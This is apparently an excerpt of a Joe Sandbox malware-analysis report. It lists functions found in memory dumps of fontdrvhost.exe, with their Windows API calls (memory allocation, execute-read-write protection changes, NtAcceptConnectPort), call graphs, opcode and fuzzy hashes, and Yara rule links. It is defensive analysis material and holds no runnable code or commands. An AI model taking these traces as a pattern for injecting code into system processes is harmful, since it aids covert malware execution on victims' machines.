                                                                                                                                                                                                                                                                                                        Function 02D102D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02D10326
                                                                                                                                                                                                                                                                                                          • Part of subcall function 02D100A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02D100CD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 02D100A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D10279
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02D10378
                                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02D103E7
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D10407
                                                                                                                                                                                                                                                                                                        • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02D1042E
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02D10456
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?), ref: 02D10471
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000003.1903939620.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_3_2d10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                                                                                                                                                                        • String ID: ,
                                                                                                                                                                                                                                                                                                        • API String ID: 3867569247-3772416878
                                                                                                                                                                                                                                                                                                        • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                        • Instruction ID: adff3a0d4764890935911ab4c9cca1749e96e302611c67bca604e5bbd4be66aa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 49610AB1900209FFDB20EFA5D885ADEBBB9FF08355F14851AF959A7640D730A980CF60
                                                                                                                                                                                                                                                                                                        Function 02D100A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02D100CD
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02D10279
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000023.00000003.1903939620.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_35_3_2d10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                        • Instruction ID: b4d38cfcc7995de2df3940aa54ccc3b08f7ffffaf7df36d9d48ab9eb2ca744da
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B719C71E04249EFDB45DF98D881BEDBBF0AB09315F248095E8A5FB741C334AA91CB64

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:33.4%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                        Signature Coverage:83.3%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:24
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                        execution_graph 415 1c0d3f11cf4 417 1c0d3f11d19 415->417 416 1c0d3f11fa1 417->416 426 1c0d3f115c0 417->426 419 1c0d3f11f98 CloseHandle 419->416 420 1c0d3f11f88 NtAcceptConnectPort 420->419 421 1c0d3f11e3a 421->419 421->420 424 1c0d3f11ecd 421->424 429 1c0d3f10ac8 421->429 424->424 435 1c0d3f11aa4 NtAcceptConnectPort 424->435 428 1c0d3f115f4 NtAcceptConnectPort 426->428 428->421 430 1c0d3f10c62 429->430 431 1c0d3f10ae8 429->431 430->424 431->430 432 1c0d3f10be8 NtAcceptConnectPort 431->432 432->430 433 1c0d3f10c1b 432->433 433->430 434 1c0d3f10c33 NtAcceptConnectPort 433->434 434->430 436 1c0d3f11c04 435->436 437 1c0d3f11af7 435->437 436->420 441 1c0d3f11870 437->441 439 1c0d3f11b10 440 1c0d3f11bb6 NtAcceptConnectPort 439->440 440->436 442 1c0d3f11889 441->442 443 1c0d3f11930 GetProcessMitigationPolicy 442->443 444 1c0d3f11949 442->444 443->444 444->439

                                                                                                                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                                        Function 000001C0D3F11CF4 Relevance: 3.3, APIs: 2, Instructions: 278nativeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AcceptCloseConnectHandlePort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3811980168-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                        • Instruction ID: e617ac0391c930df3ec36eb759f439517ca970650210649f1876c03132f4b1cf
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33919230548B18CFEB65EB98D441BF573E1FB98710F14465AE48BC7296EA74E842CB82
                                                                                                                                                                                                                                                                                                        Function 000001C0D3F10AC8 Relevance: 3.2, APIs: 2, Instructions: 185nativeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                                                        • Instruction ID: 00a6a8a1cf1180d0bf68227c7e5df276bf2f3cc218b24ba37a7d61729fd37ce0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 275693e7d66e5d53f7e2184dfa7c88ce453f9d9d0d3e8ba4525500231a394657
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4515A30558A2A8AF32EA7B89895AB977E1F785709F34015EE0F3C5293D924C5478B83
                                                                                                                                                                                                                                                                                                        Function 000001C0D3F11AA4 Relevance: 3.2, APIs: 2, Instructions: 150nativeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AcceptConnectPort$MitigationPolicyProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2923266908-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 98fa1f76084e2522e95b870a42b1083b1363c754b5df3a25d05673e6e787480e
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7c877b781110a0d6e647df344fb2e40eb660a4b7f668a210715c22aed20397b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5141E330208B488FDB45DF6CD889BA57BD1EB59320F04439EE85ECB2D7DA34C9498796
                                                                                                                                                                                                                                                                                                        Function 000001C0D3F115C0 Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 118 1c0d3f115c0-1c0d3f115f2 119 1c0d3f115f4-1c0d3f115f7 118->119 120 1c0d3f115f9-1c0d3f115fb 118->120 121 1c0d3f1161f-1c0d3f1166d NtAcceptConnectPort 119->121 122 1c0d3f1160b-1c0d3f1160d 120->122 123 1c0d3f115fd-1c0d3f11609 120->123 124 1c0d3f1161d 122->124 125 1c0d3f1160f-1c0d3f1161b 122->125 123->121 124->121 125->121
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,000001C0D3F11E3A), ref: 000001C0D3F11654
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AcceptConnectPort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1658770261-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                        • Instruction ID: 65a4af3e8fdee327f26f74137b006e5f4c22234e6698857e75c01d52750d425b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83215471518B08CFEB59DF98C4C9AA9B7F1FBA8705F140A6EE44AC7250D731D485CB42
                                                                                                                                                                                                                                                                                                        Function 000001C0D3F11870 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 95 1c0d3f11870-1c0d3f118a0 call 1c0d3f108a4 * 2 100 1c0d3f11954-1c0d3f1195b 95->100 101 1c0d3f118a6-1c0d3f118a9 95->101 101->100 102 1c0d3f118af-1c0d3f118b9 101->102 102->100 103 1c0d3f118bf-1c0d3f118c4 102->103 103->100 104 1c0d3f118ca-1c0d3f118d7 103->104 104->100 105 1c0d3f118d9-1c0d3f118e1 104->105 105->100 106 1c0d3f118e3-1c0d3f118ee 105->106 106->100 107 1c0d3f118f0-1c0d3f118f7 106->107 107->100 108 1c0d3f118f9-1c0d3f118fc 107->108 108->100 109 1c0d3f118fe-1c0d3f11906 108->109 109->100 110 1c0d3f11908-1c0d3f1190b 109->110 110->100 111 1c0d3f1190d-1c0d3f11916 110->111 111->100 112 1c0d3f11918-1c0d3f1191c 111->112 112->100 113 1c0d3f1191e-1c0d3f1192e 112->113 113->100 115 1c0d3f11930-1c0d3f11947 GetProcessMitigationPolicy 113->115 115->100 116 1c0d3f11949-1c0d3f1194e 115->116 116->100 117 1c0d3f11950-1c0d3f11951 116->117 117->100
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                        • Instruction ID: c97f6764a3645df366f03d2be74655a942a7248aac6516df29f8ddfb523cdb4a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26f3b5b73fc16ab59c2c5e195c9b4eeee4e831d251455a47b6c64e26f9aa79e3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7318430240B2FCAFBE697E8E494BF173E0EB98710F9401BAC027D71D1EA65C949CA41

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 000001C0D3F10511 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000027.00000002.2123050361.000001C0D3F10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C0D3F10000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_39_2_1c0d3f10000_fontdrvhost.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1684949b0e2b346c4f6e13502068689c61c9b2d028cdf62c4328b71d82623ec0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 247c94ababd4710b0196191072c8bbb5758b71c13019f7a788401a9348e82e18
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFB01130E2AA00C2E3880E0AB8023A0F2B2C30B300F02B2322002F3220CA28CC08028F